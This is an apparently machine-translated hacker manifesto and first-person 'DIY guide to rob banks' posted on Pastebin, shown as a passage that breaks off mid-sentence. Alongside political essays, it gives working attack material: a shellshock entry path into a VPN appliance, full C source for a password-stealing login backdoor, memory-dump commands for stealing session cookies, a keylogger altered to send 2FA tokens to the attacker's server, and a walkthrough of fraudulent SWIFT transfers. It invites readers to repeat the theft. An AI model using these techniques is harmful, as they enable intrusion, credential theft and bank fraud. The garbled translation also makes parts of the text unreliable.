Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _ _ ____ _ _
- | | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
- | | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
- | _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
- | _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
- A DIY guide to rob banks
- ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- ''
- By Subcowmandante Marcos
- I am a wild child
- Innocent, free, wild
- I have all ages
- My grandparents live in me
- I'm brother of the clouds
- And I only know how to share
- I know everything belongs to everyone
- that everything is alive in me
- My heart is a star
- I am a son of the earth
- I travel aboard my spirit
- Road to eternity
- This is my simple word that seeks to touch the hearts of simple people and
- Humble, but also dignified and rebellious. This is my simple word to tell
- of my hacks, and to invite other people to hack with cheerful
- rebellion.
- I hacked a bank. I did it to give a liquidity injection, but this time since
- below and to the simple and humble people who resist and rebel against
- injustices worldwide. In other words: I robbed a bank and gave away the
- money. But it wasn't me alone who did it. The free software movement, the
- offensive powershell community, metasploit project and hacker community
- in general they are the ones that enabled this hacking. The exploit.in community
- made it possible to convert intrusion into a bank's computers into cash
- and bitcoin The Tor, Qubes and Whonix projects, together with the cryptographers and
- activists who defend privacy and anonymity, are my nahuales, is
- say, my protectors [1]. They accompany me every night and make it possible for me to stay in
- freedom.
- I did nothing complicated. I only saw the injustice in this world, I felt love
- for all beings, and I expressed that love in the best way I could, through
- tools that I know how to use. Hate does not move me to banks, nor to the rich, but
- a love for life, and the desire for a world where everyone can perform their
- potential and live a full life. I would like to explain a little how I see the world,
- so they can get an idea of how I came to feel and act like that.
- And I also hope that this guide is a recipe that you can follow, combining the
- Same ingredients for baking the same cake. Who knows, there you are
- such powerful tools end up also serving you to express the
- love they feel
- We are all wild children
- innocent, free, wild
- We are all brothers of the trees
- children of the earth
- We just have to put in our heart
- a burning star
- (song by Alberto Kuselman and Chamalú)
- The police will invest a chingo of resources to investigate me. They think the
- system works, or at least it will work once they catch all the
- "bad boys". I am nothing more than the product of a system that does not work.
- As long as there is injustice, exploitation, alienation, violence and
- ecological destruction, many more will come like me: an endless series of
- people who will reject as illegitimate the bad system responsible for this
- suffering. That badly done system is not going to compose by arresting me. I am
- only one of the millions of seeds that Tupac planted 238 years ago in La
- Peace [2], and I hope that my actions and writings water the seed of rebellion
- In their hearts
- [1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
- [2] It was before he was killed by the Spaniards, just one day like yesterday, that
- He said that "they will only kill me, but tomorrow I will return and I will be millions."
- ____________________________________________
- <To be seen, we cover our faces>
- --------------------------------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- ''
- To make us listen, hackers sometimes have to cover our faces, because
- We are not interested in seeing our face but understanding our word. The
- mask can be from Guy Fawkes, Salvador Dalí, from Fsociety, or in some cases
- The puppet of a crested toad. By affinity, this time I went to dig up
- a deceased to lend me his balaclava. I think then I should clarify that
- Sup Marcos is innocent of everything that is told here because, besides being
- Dead, I didn't consult him. I hope your ghost, if you find out from a hammock
- Chiapaneca, know how to find the goodness to, as they say there, "dismiss this
- deep fake "with the same gesture with which an inopportune insect moves away - that's fine
- It could be a beetle.
- Still with the balaclava and the name change, many of those who support my
- Actions are perhaps going to pay too much attention to my person. With its own
- autonomy shattered for a lifetime of domination, they will be looking for a
- leader to follow, or a hero who saves them. But behind the balaclava only
- I am a Girl. We are all wild children. We just have to place a star
- in chamas em nossos corações.
- - [1 - Why expropriate] ----------------------------------------- ------------
- Capitalism is a system in which a minority has come to appropriate
- a vast majority of the world's resources through war, theft and
- The explotion. By snatching the commons [1], they forced those below to
- being under the control of that minority that owns everything. It is a system
- fundamentally incompatible with freedom, equality, democracy and
- Sum Qamaña (Good Living). It may sound ridiculous to those of us who have grown up in a
- propaganda machinery that taught us that capitalism is freedom, but in
- Truly what I say is not a new or controversial idea [2]. The founders
- from the United States of America knew they had to choose between creating a
- capitalist society, or a free and democratic one. Madison recognized that "the
- man who possesses wealth, he who lies on his couch or rolls in his carriage,
- cannot judge the wishes or feelings of the day laborer. "But to protect himself
- in front of the "spirit of equalization" of the landless day laborers, it seemed
- that only landowners should vote, and that the government had to
- serve to "protect the opulent minority against the great majority." John
- Jay was more to the point and said: "Those who own the country should
- rule it. "
- ____________________________________________________
- / There is no such thing as green capitalism. \
- | Let's make capitalism history before we |
- \ become history. /
- -------------------------------------------------- -
- \ / \ ___ / \
- \ // \ / \ / \\
- ((O O))
- \\ / \ //
- \ / | | \ /
- | | | | Evgeny, the great ignored elephant, doesn't understand why everyone
- | | | | They pretend not to see you on the panels on climate change, so
- | or | Here I give you a chance to say your lines.
- | | | |
- | m | | m |
- In the same way that bell hooks [3] argues that the rejection of culture
- Patriarchal domination is an act in defense of the male interest (already
- that emotionally mutilates them and prevents them from feeling love and connection in a way
- full), I believe that the culture of domination of capitalism has an effect
- similar about the rich, and that they could have fuller and more satisfying lives
- if they rejected the class system from which they believe they benefit. For many,
- class privilege equals a childhood of emotional neglect, followed
- of a life of superficial social interactions and meaningless work. May
- that deep down they know that they can only genuinely connect with people
- when they work with them as their peers, and not when they put them at their service.
- They may know that sharing their material wealth is the best they can do.
- with her. You may also know that meaningful experiences,
- connections and relationships that count are not the ones that come from
- mercantile interactions, but precisely to reject the logic of the market
- and give without expecting anything in return. They may know that everything they need to
- escape from his prison and live really is to let go, give up control, and
- Take a leap of faith. But most lack courage.
- Then it would be naive of us to direct our efforts to try to
- produce some kind of spiritual awakening in the rich [4]. As Assata says
- Shakur: "No one in the world, no one in history, has ever achieved his
- freedom appealing to the moral sense of its oppressors. "Actually, when
- rich people distribute their money, they almost always do it in a way that reinforces the
- system that to begin with allowed them to amass their enormous and illegitimate wealth
- [5]. And change is unlikely to come through a political process;
- As Lucy Parsons says: "Let's never be fooled by the rich
- they are going to let them vote to take away their wealth. "Colin Jenkins justifies the
- expropriation with these words [6]:
- Make no mistake, expropriation is not theft. It is not the confiscation of
- money earned "with the sweat of the forehead." It is not property theft
- private It is, rather, the recovery of huge amounts of land and
- wealth that has been forged with stolen natural resources, slavery
- human, forced labor force and kneaded in hundreds of years by a
- Small minority This wealth ... is illegitimate, both for moral purposes and for
- as for the exploitation mechanisms that have been used to create it.
- For Colin, the first step is that "we have to free ourselves from our bonds
- mental (believing that wealth and private property have been earned by
- who monopolize them; and that, therefore, they should be something to respect,
- reverence, and even something to pursue), open our minds, study and
- learn from history, and recognize this illegitimacy together. "Here I leave you
- some books that have helped me with this [7] [8] [9] [10] [11].
- According to Barack Obama, economic inequality is "the challenge that defines our
- time. "Computer hacking is a powerful tool to combat
- economic inequality. The former director of the NSA, Keith Alexander, agrees
- and says that hacking is responsible for "the greatest transfer of wealth of the
- history".
- _________________________
- / The story is ours \
- And they do it hackers! /
- -------------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- ''
- Allende present, now and forever!
- [1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
- [2] https://chomsky.info/commongood02/
- [3] The Will to Change: Men, Masculinity, and Love
- [4] his own religion is already very clear about it:
- https://dailyverses.net/es/materialismo
- [5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
- [6] http://www.hamptoninstitution.org/expropriation-or-bust.html
- [7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Era
- of the Masked Gods and the Covered Kings
- [8] Caliban and the Witch
- [9] In debt: An alternative history of the economy
- [10] The other story of the United States
- [11] The open veins of Latin America
- _________________________________
- <Our weapon is our keyboard>
- ---------------------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- `` ^^ ^^
- - [2 - Introduction] ------------------------------------------- ---------------
- This guide explains how I hacked the Cayman Bank and Trust Company
- (Isle of Man). Why am I publishing this, almost four years later?
- 1) To show what is possible
- Hackers working for social change have limited themselves to developing
- security and privacy tools, DDoS, perform defaults and leaks.
- Wherever you go there are radical projects for a complete social change
- state of precariousness, and they could do a lot with some money
- expropriated At least for the working class, bank robbery is something
- socially accepted, and those who do are seen as heroes of the people. In
- the digital age, robbing a bank is a non-violent, less risky act, and the
- Reward is greater than ever. So why are only hackers from
- black hat that they do for their personal benefit, and never
- hacktivists to finance radical projects? Maybe they don't think they are
- able to do it The big bank hacks come out on the news every
- as much as the hacking to the Bank of Bangladesh [1], which was attributed to Korea's
- North, or the hacks to banks attributed to the Carbanak group [2], which they describe
- as a very large and well organized group of Russian hackers, with different
- members who would be specialized in different tasks. And, well it's not so
- complicated.
- It is because of our collective belief that the financial system is unquestionable
- that we exercise control over ourselves, and maintain the class system
- without those above having to do anything [3]. Be able to see how vulnerable and
- fragile is actually the financial system helps us break that hallucination
- collective That is why banks have a strong incentive not to report the
- hacks, and to exaggerate how sophisticated the attackers are. None of the
- financial hacks that I did, or of which I have known, has never been reported.
- This is going to be the first, and not because the bank would like to, but because I
- I decided to publish it.
- As you are about to learn in this homemade guide, hack a bank and
- transferring money through the SWIFT network does not require the support of any
- government, nor of a large and specialized group. It is something totally possible
- being a mere amateur hacker and heap, with just tools
- public and basic knowledge of how to write a script.
- [1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
- [2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
- [3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
- 2) Help withdraw cash
- Many of those who read this already have, or with a little study are going to be
- able to acquire the necessary skills to carry out a hacking
- like this. However, many will find that they lack the
- criminal connections necessary to get the handles in condition. In Myself
- case, this was the first bank that hacked, and at that time I only had a few
- few and mediocre accounts prepared to withdraw cash (known
- as bank drops), so it was only a few hundred thousand who
- I was able to withdraw in total, when it is normal to get millions. Now instead
- that I have the knowledge and connections to get cash more seriously, from
- so if they are hacking a bank but they need help to convert
- that in real money, and they want to use that wool to finance projects
- radical social, contact me.
- 3) Collaborate
- It is possible to hack banks as an amateur who works alone, but the
- It is clear that, in general, it is not as easy as I paint it here. I was lucky with
- This bank for several reasons:
- 1) It was a small bank, so it took me much less time to get to
- Understand how everything worked.
- 2) They had no procedure to check the sent swift messages.
- Many banks have one, and you need to write code to hide your
- transfers from your monitoring system.
- 3) They only used password authentication to access the application with the
- that connected to the SWIFT network. Most banks now use RSA
- SecurID, or some form of 2FA. You can skip this by writing code to
- receive an alert when they enter your token, and thus be able to use it before
- expire It's simpler than it seems: I've used Get-Keystrokes [1],
- modifying it so that instead of storing the pressed keys, a
- GET request to my server every time it is detected that they have entered a
- Username. This request adds the username to the url and,
- as they type the token, several GETs are made with the token digits
- concatenated to the url. On my side I leave this running in the meantime:
- ssh yo @ my_secret_server 'tail -f / var / log / apache2 / access_log'
- | while read i; I miss $ i; aplay alarm.wav &> / dev / null; done
- If it is a web application, you can skip the 2FA by stealing the cookie
- after they have authenticated. I am not an APT with a team of coders
- That can make me custom tools. I am a simple person who lives
- of what terminal [2] gives, so what I use is:
- procdump64 / accepteula -r -ma PID_del_browser
- strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul
- or going through findstr rather than strings, which makes it much more
- Quick:
- findstr PHPSESSID * .dmp> tmp
- strings64 / accepteula tmp | findstr PHPSESSID 2> nul
- Another way to skip it is to access your session with a hidden VNC (hvnc)
- after they have authenticated, or with a little creativity too
- you could focus on another part of your process instead of sending messages
- SWIFT directly.
- I think that if I collaborated with other experienced bank hackers we could
- make hundreds of banks like Carnabak, instead of doing one of those
- in both on my own. So if you have experience with similar hacks and
- You want to collaborate, contact me. You will find my email and my PGP key at the end of
- the previous guide [3].
- [1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
- Exfiltration / Get-Keystrokes.ps1
- [2] https://lolbas-project.github.io/
- [3] https://www.exploit-db.com/papers/41914
- ________________________________________
- / If robbing a bank would change things, \
- \ would make it illegal /
- ----------------------------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- ''
- - [3 - Be careful out there] ---------------------------------------- ------
- It is important to take some simple precautions. I'm going to refer to this
- same section of my last guide [1], since apparently it works just fine
- [2]. All I have to add is that, in Trump's words, "Unless
- catch hackers in fraganti, it is difficult to determine who is that
- I was hacking, "so the police are getting more and more
- creative [3] [4] in their attempts to grab criminals on the spot (when
- your encrypted hard drives are unlocked). So it would be nice if by
- example you carry a certain bluetooth device and configure your
- computer to shut down when it moves beyond a certain range, or
- when an accelerometer detects movement, or something like that.
- You may write long articles detailing your actions and your ideology not
- it's the safest thing in the world (ups!), but at times I feel I had to
- do what.
- If I didn't believe in who listens to me
- If I didn't believe in what hurts
- If I didn't believe in what's left
- If I didn't believe in what I fought
- What a thing ...
- What was the club without a quarry?
- [1] https://www.exploit-db.com/papers/41914
- [2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
- phineas-fisher.html
- [3] https://www.wired.com/2015/05/silk-road-2/
- [4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
- alphabay-arrest-video
- , - \ __
- | f- "Y \ ____________________
- \ () 7L / | Be gay! |
- cgD | Do the crime! | __ _
- | \ (---------------------. 'Y'>,
- \ \ \ / _ _ \
- \\\ \) (_) (_) (|}
- \\\ {4A} /
- \\\ \ uLuJJ / \ l
- \\\ | 3 p) /
- \\\ ___ __________ / nnm_n //
- c7 ___-__, __-) \, __) (". \ _> - <_ / D
- // V \ _ "-._.__ G G_c __.-__ <" / (\
- <"-._> __-, G _.___) \ \ 7 \
- ("-.__. | \" <.__.- ") \ \
- | "-.__" \ | "-.__.-". \ \ \
- ("-.__" ". \" -.__.- ". | \ _ \
- \ "-.__" "|! |" -.__.- ".) \ \
- "-.__" "\ _ |" -.__.- "./ \ l
- ".__" ""> G> -.__.- "> .--, _
- "" G
- Many blame queer people for the decline of this society;
- we are proud of it
- Some believe we want to reduce to ashes
- this civilization and its moral fabric;
- They couldn't be more right
- They often describe us as depravadxs, decadent and revoltosxs
- But alas! They haven't seen anything yet
- https://theanarchistlibrary.org/library/mary-nardini-gang-be-gay-do-crime
- - [4 - Get access] ------------------------------------------ ------------
- In another place [1] I talked about the main ways to get
- Initial access to a company's network during a targeted attack. But nevertheless,
- This was not a targeted attack. I didn't set out to hack a specific bank, what
- I wanted to hack any bank, which ends up being a lot of homework
- more simple This type of nonspecific approach was popularized by Lulzsec and
- Anonymous [2]. As part of [1], I prepared an exploit and tools for
- post-exploitation for a popular VPN device. Then I started scanning the
- entire internet with zmap [3] and zgrab to identify other devices
- vulnerable I had the scanner save the vulnerable IPs, along with the
- "common name" and "alt names" of the device's SSL certificate, the names
- Windows domain of the device, and reverse DNS lookup of the IP. You
- I did a grep to the result in search of the word "bank", and there was enough to
- choose, but the truth is that the word "Cayman" attracted me, and that is how I came
- to stay with this one.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
- [3] https://github.com/zmap/zmap
- ---- [4.1 - The Exploit] ---------------------------------------- ----------------
- When I published my latest DIY guide [1] I didn't reveal the exploit details of
- sonicwall that he had used to hack Hacking Team, since it was very useful for
- other hacks, like this one, and I still hadn't finished having fun with him.
- Determined then to hack Hacking Team, I spent weeks doing engineering
- Reverse to his sonicwall ssl-vpn model, and I even managed to find
- several memory corruption vulnerabilities more or less difficult to
- explode, before I realized that the device was easily exploitable
- with shellshock [2]. When shellshock came out, many sonicwall devices were
- vulnerable, only with a request to cgi-bin / welcome, and a payload in the
- user-agent Dell released a security update and an advisory for these
- versions. The version used by Hacking Team and this bank had the version of
- bash vulnerable, but cgi requests didn't fire the shellshock except for
- the requests to a shell script, and there was just one accessible:
- cgi-bin / jarrewrite.sh. This seems to have escaped Dell's in his note,
- since they never released a security update or an advisory for that
- sonicwall version. And, kindly, Dell had done twounix setuid root,
- leaving an easy device to root.
- In my last guide many read that I spent weeks researching a device
- until they found an exploit, and they assumed that meant that I was some kind
- of elite hacker. The reality, that is, the fact that it took me two weeks
- realize that it was trivially exploitable with shellshock, maybe less
- Flattering to me, but I think it's also more inspiring. Show that
- You can really do this for yourself. You don't need to be a genius, I
- I certainly am not. Actually my work against Hacking Team started a
- year before When I discovered Hacking Team and the Gamma Group in the
- CitizenLab research [3] [4], I decided to explore a bit and see if I could
- find something. I didn't get anywhere with Hacking Team, but I was lucky with
- Gamma Group, and I was able to hack your customer support portal with sql injection
- Basic and file upload vulnerabilities [5] [6]. However, despite
- that its support server gave me a pivot towards the internal Gamma network
- Group, I was unable to penetrate beyond the company. from this one on
- experience with the Gamma Group and other hacks, I realized that I was
- really limited by my lack of knowledge about privilege escalation and
- lateral movement in windows domains, active directory and windows in general.
- So I studied and practiced (see section 11), until I felt I was ready
- to return to visit Hacking Team almost a year later. The practice
- paid off, and this time I was able to make a complete commitment to the
- company [7]. Before I realized that I could go in with shellshock, I was
- willing to spend happy whole months of life studying development of
- exploits and writing a reliable exploit for one of the vulnerabilities of
- Memory corruption I had found. I just knew that Hacking Team
- I needed to be exposed, and it would take as much time as necessary and
- I would learn what I had to learn to get it. To perform these
- Hacks you don't need to be bright. You don't even need great knowledge
- technical. You just need dedication, and believe in yourself.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
- [3] https://citizenlab.ca/tag/hacking-team/
- [4] https://citizenlab.ca/tag/finfisher/
- [5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
- bahrain-track-arab-spring-protesters /
- [6] https://www.exploit-db.com/papers/41913
- [7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
- ---- [4.2 - The Backdoor] ---------------------------------------- ---------------
- Part of the backdoor that I prepared for Hacking Team (see [1], section 6) was a
- Simple wrapper on the login page to capture passwords:
- #include <stdio.h>
- #include <unistd.h>
- #include <fcntl.h>
- #include <string.h>
- #include <stdlib.h>
- int main ()
- {
- char buf [2048];
- int nread, pfile;
- / * pull the log if we send a special cookie * /
- char * cookies = getenv ("HTTP_COOKIE");
- if (cookies && strstr (cookies, "our private password")) {
- write (1, "Content-type: text / plain \ n \ n", 26);
- pfile = open ("/ tmp / .pfile", O_RDONLY);
- while ((nread = read (pfile, buf, sizeof (buf)))> 0)
- write (1, buf, nread);
- exit (0);
- }
- / * the principal stores the POST data and sends it to the child,
- what is the real login program * /
- int fd [2];
- pipe (fd);
- pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
- if (fork ()) {
- close (fd [0]);
- while ((nread = read (0, buf, sizeof (buf)))> 0) {
- write (fd [1], buf, nread);
- write (pfile, buf, nread);
- }
- write (pfile, "\ n", 1);
- close (fd [1]);
- close (pfile);
- wait (NULL);
- } else {
- close (fd [1]);
- dup2 (fd [0], 0);
- close (fd [0]);
- execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
- "userLogin", NULL);
- }
- }
- In the case of Hacking Team, they logged into the VPN with single-use passwords,
- so the VPN gave me access only to the network, and from there it took me
- An extra effort to get domain admin on your network. In the other guide I wrote
- on lateral passes and privilege escalation in windows domains [1]. In this
- case, however, it was the same windows domain passwords that were
- they used to authenticate against the VPN, so I could get a good
- User passwords, including the domain admin. Now I had total
- access to your network, but usually this is the easy part. The most complicated part
- is to understand how they operate and how to get the gun.
- [1] https://www.exploit-db.com/papers/41914
- ---- [4.3 - Fun facts] ---------------------------------------- ------------
- Following the investigation they did about the hacking, I found it interesting
- see that, by the same time I did it, the bank could have been
- committed by someone else through a targeted phishing email [1].
- As the old saying goes, "give a person an exploit and they will have access by a
- day, teach phishear and he will have access all his life "[2]. The fact that
- someone else, by chance and at the same time as me, put on this bank
- small in the sights (they registered a domain similar to the real domain of the bank
- to be able to send phishing from there) suggests that bank hacks
- They occur much more frequently than is known.
- A fun suggestion so you can follow your research
- hacking is having a backup access, one that you won't touch unless
- lose normal access I have a simple script that expects commands a
- once a day, or less, just to maintain long-term access in the case of
- that block my regular access. Then I had an empire powershell [3]
- calling home more frequently to a different IP, and used empire to
- launch meterpreter [4] against a third IP, where he performed most of
- my job. When PWC started investigating the hacking, they found my use of
- empire and meterpreter and cleaned those computers and blocked those IPs, but
- They did not detect my backup access. PWC had placed devices
- network monitoring, to be able to analyze the traffic and see if there was still
- infected computers, so I didn't want to connect much to their network. Alone
- I launched mimikatz once to get the new passwords, and from there
- I was able to continue your research by reading your emails in the outlook web access.
- [1] page 47, Project Pallid Nutmeg.pdf, in torrent
- [2] https://twitter.com/thegrugq/status/563964286783877121
- [3] https://github.com/EmpireProject/Empire
- [4] https://github.com/rapid7/metasploit-framework
- - [5 - Understand Banking Operations] ------------------------------------
- To understand how the bank operated, and how I could get money, I followed the
- techniques that I summarized in [1], in section "13.3 - Internal Recognition".
- I downloaded a list of all file names, I did a grep in search
- of words like "SWIFT" and "transfer", and I downloaded and read all the
- Files with interesting names. I also looked for emails from employees, but from
- by far the most useful technique was to use keyloggers and screenshots to
- observe how the bank employees worked. I didn't know it by then, but
- For this windows brings a very good monitoring tool [2]. How I know
- described in technique no. 5 of section 13.3 in [1], I captured the
- keys pressed throughout the domain (including window titles), I made a
- grep in search of SWIFT, and I found some employees opening 'SWIFT Access
- Service Bureau - Logon '. For those employees, I ran meterpreter as in [3], and
- I used the post / windows / gather / screen_spy module to take screenshots
- every 5 seconds, to see how they worked. They were using an app
- remote citrix of the bottomline company [4] to access the SWIFT network, where
- Each payment message SWIFT MT103 had to go through three employees: one
- to "create" the message, one to "verify it", and another to "authorize it". How
- I already had all his credentials thanks to the keylogger, I could perform with
- Ease the three steps myself. And from what I knew after seeing them
- work, they didn't check the sent SWIFT messages, so you should have
- enough time to get the money from my bank drops before the bank
- He would realize and try to reverse the transfers.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
- remotely-with-metasploit /
- [3] https://www.trustedsec.com/blog/no_psexec_needed/
- [4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
- _________________________________________
- / Who steals a thief, is one hundred years old \
- \ sorry /
- -----------------------------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- ''
- - [6 - Send money] ----------------------------------------- -------------
- I had no idea what I was doing, so I was discovering
- by the way. Somehow, the first transfers I sent came out
- well. The next day, I screwed up by sending a transfer to Mexico that put
- End to my fun. This bank sent its international transfers
- through your correspondent account in Natwest. I had seen the bill
- correspondent for transfers in pounds sterling (GBP) appeared as
- NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The transference
- Mexican was in GBP, so I assumed that I had to put NWBKGB2LGPL as
- correspondent. If I had prepared it better I would have known that the GPL instead of
- XXX indicated that the payment would be sent through the Fast Payment Service of the
- United Kingdom, rather than as an international transfer, which obviously
- Well, it won't work when you're trying to send money to Mexico. So
- The bank received an error message. The same day I also tried to send a
- Payment of £ 200k to UK using NWBKGB2LGPL, which was not made because 200k exceeded the
- shipping limit by fast payments, and would have had to use NWBKGB2LXXX in
- time. They also received an error message for this. They read the messages, what
- They investigated, and found the rest of my transfers.
- - [7 - The loot] ------------------------------------------ --------------------
- From what I write, a complete idea of what my ideals are and
- What things I give my support. But I don't want to see anyone in legal trouble
- for receiving expropriated funds, so not another word of where to go
- It was the wool. I know journalists are probably going to want to put some
- number about how many dollars were distributed in this hack and others
- similar, but I prefer not to encourage our perverse habit of measuring
- actions just for their economic value. Any action is admirable if
- It comes from love and not from the ego. Unfortunately those above, the rich and
- powerful, public figures, businessmen, people in positions
- "important", those that our society respects and values most, those have
- placed where they are based on acting more from the ego than from love. Is in
- the simple, humble and "invisible" people we should look at and
- Who should we admire?
- - [8 - Cryptocurrencies] ------------------------------------------- --------------
- Redistribute expropriated money to Chilean projects that seek social change
- positive would be easier and safer if those projects accepted donations
- anonymous via cryptocurrencies like monero, zcash, or at least bitcoin. It is understood
- that many of these projects have an aversion to cryptocurrencies, since
- they look more like some strange hypercapitalist dystopia than the economy
- social with which we dream. I share their skepticism, but I think they turn out
- useful to allow donations and anonymous transactions, by limiting the
- Government surveillance and control. Same as cash, whose use many
- Countries are trying to limit for the same reason.
- - [9 - Powershell] ------------------------------------------- -----------------
- In this operation, as in [1], I made a lot of use of powershell. By
- so, powershell was super cool, you could do almost anything that
- you would like, without antivirus detection and with very little forensic footprint. It happens
- that with the introduction of AMSI [2] the offensive powershell is retiring.
- Today the C # offensive is what is on the rise, with tools like
- [3] [4] [5] [6]. AMSI is going to get to .NET for 4.8, so to the tools in
- C # probably still have a couple of years left before they become outdated.
- And then we'll use C or C ++ again, or maybe Delphi gets back on
- fashion. The specific tools and techniques change every few years, but in
- the bottom line is not so much what changes, today hacking is essentially still the
- Same thing it was in the 90s. In fact all powershell scripts
- employees in this guide and in the previous one [1] are still perfectly usable
- today, after a small obfuscation of your own harvest.
- [1] https://www.exploit-db.com/papers/41914
- [2] https://medium.com/@byte_St0rm/
- adventures-in-the-wonderful-world-of-amsi-25d235eb749c
- [3] https://cobbr.io/SharpSploit.html
- [4] https://github.com/tevora-threat/SharpView
- [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
- [6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
- ___________________________
- / Fo Sostyn, Fo Ordaag \
- \ Financial Sector Fuck Off /
- ---------------------------
- \
- \ ^ __ ^
- (oo) \ _______
- ((__) \) \ / \
- _) / || ---- w |
- (.) / || ||
- ''
- - [10 - Torrent] ------------------------------------------- -------------------
- Privacy for the weak, transparency for the powerful.
- Offshore banking provides privacy to its own government to
- executives, politicians and millionaires. Exposing them may sound
- hypocritical of me, since I am generally in favor of privacy and
- against government surveillance. But the law was already written by and
- for the rich: it protects its exploitation system, with some limits (such as
- taxes) so that society can function and the system does not collapse under the
- weight of your own greed. So no, privacy is not the same for
- powerful, when it allows them to evade the limits of a system in itself
- designed to give them privileges; and privacy for the weak, to whom
- protects from a system designed to exploit them.
- Even journalists with the best intentions find it impossible
- study such a huge amount of material and know what will result
- relevant to people in different parts of the world. When I filtered the
- Hacking Team files, I gave The Intercept a copy of the emails
- Electronic one month in advance. They found a couple of the 0days that
- Hacking Team was using, previously reported to MS and Adobe and published
- A few stories once the leak was made public. No point
- compared to the huge amount of articles and research that came after
- Full filtration to the public. Seeing it this way, and also considering the (no)
- editorialized publication [1] of the Panama papers, I think a
- Public and complete filtration of this material is the right choice.
- [1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
- protect-western-1-from-panama-leak /
- Psychologists found that those who are lower in the hierarchies tend to
- understand and empathize with those on top, but that the opposite is less
- common. This explains why, in this sexist world, many men joke about
- his inability to understand women, as if it were a mystery
- irresolvable. Explain why the rich, if they stop to think about who
- they live in poverty, give some advice and some "solutions" so alien to the
- reality that makes you want to laugh. Explain why we revere executives
- as brave who take risks. What do they risk, beyond their
- privilege? If all their ventures fail, they will have to live and work
- Like the rest of us. It also explains why there will be many who accuse
- of irresponsible and dangerous to this filtration without crossing out. Feel the
- "danger" about an offshore bank and its customers much more intensely than
- what they feel the misery of those dispossessed by this unfair system and
- unequal. And is the filtration of their finances, is it a danger to them, or
- just for your position at the top of a hierarchy that you shouldn't even
- exist?
- , ------------------------------------------------- -.
- _, -._ | They vilify us, those infamous; when the only |
- ; ___: | difference is that they rob the poor |
- , - '(..' '--.__ | covered by the law, heaven knows, and we |
- _; ||| \ | we plunder the rich under the sole protection of |
- '._, -----' ''; = .____, "| our own courage. Don't you prefer to be |
- /// <or> | ## | | one of us, rather than indulge in those |
- (or \ `- '/ villains looking for work? |
- /// \ >>>> _ \ <<<< // `--------------------------------- ------------------ '
- --._ >>>>>>>> <<<<<<<< /
- ___ () >>> [||||] <<<<
- `- '>>>>>>>> <<<<<<<
- >>>>>>> <<<<<<
- >>>>> <<<<<
- >> ctr <<
- Captain Bellamy
- - [11 - Learn to hack] ----------------------------------------- -----------
- You don't start hacking well. You start hacking shit, thinking
- which is good, and then you gradually improve. That's why I always say
- that one of the most valuable virtues is persistence.
- - Octavia Butler's advice for the APT candidate
- The best way to learn to hack is by hacking. Arm a laboratory with
- virtual machines and start trying things, taking a break to investigate
- Anything you don't understand At least you will want a windows server
- as a domain controller, another normal windows vm attached to the domain, and a
- development machine with visual studio to compile and modify tools.
- Try to make an office document with macros that launch meterpreter or another
- RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
- psexec and other lateral pass techniques [1]; as well as the other scripts,
- tools and techniques mentioned in this guide and in the previous one [2]. To the
- You can disable windows defender first, but then try everything
- having it activated [3] [4] (but deactivating the automatic sending of samples).
- Once you're comfortable with all that, you'll be ready to hack 99% of the
- Companies There are a couple of things that at some point will be very useful in your
- learning, how to get comfortable with bash and cmd.exe, a domain
- basic powershell, python and javascript, have knowledge of kerberos [5] [6]
- and active directory [7] [8] [9] [10], and fluent English. A good book
- Introductory is The Hacker Playbook.
- I also want to write a little about things to not focus on if you don't
- you want to entertain just because someone told you that you are not a hacker "of
- true "if you don't know assembler. Obviously, learn whatever interests you,
- but I write these lines thinking about those things in which you can
- center in order to get practical results if you are looking for hacking
- companies to filter and expropriate. A basic knowledge of security in
- web applications [11] is useful, but specializing more in web security is not
- really the best use of your time, unless you want to make a career in
- Pentesting or hunting rewards for bugs. CTFs, and most of the
- resources you will find when looking for information about hacking, focus
- generally in skills such as web security, reverse engineering, development
- of exploits, etc. Things that make sense by understanding them as a way of
- prepare people for careers in the industry, but not for our
